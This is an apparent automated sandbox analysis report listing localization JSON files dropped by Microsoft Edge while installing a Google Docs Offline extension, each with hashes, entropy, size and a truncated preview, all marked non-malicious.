                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                        Malicious:false
